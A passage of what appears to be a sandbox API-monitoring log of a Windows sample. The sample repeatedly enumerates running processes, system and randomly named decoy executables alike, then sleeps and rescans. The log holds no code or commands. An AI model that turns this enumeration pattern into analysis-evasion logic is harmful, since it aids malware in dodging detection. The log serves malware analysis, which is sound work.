pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.544] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="slopefirewall.exe")) returned 1 [0108.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.621] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.623] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.624] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.629] CloseHandle (hObject=0xc4) returned 1 [0108.629] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.634] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.672] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.674] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.677] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.678] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.681] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 
[0108.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="sppsvc.exe")) returned 1 [0108.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0108.697] CloseHandle (hObject=0xbc) returned 1 [0108.697] Sleep (dwMilliseconds=0x12c) [0109.050] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.056] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.061] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 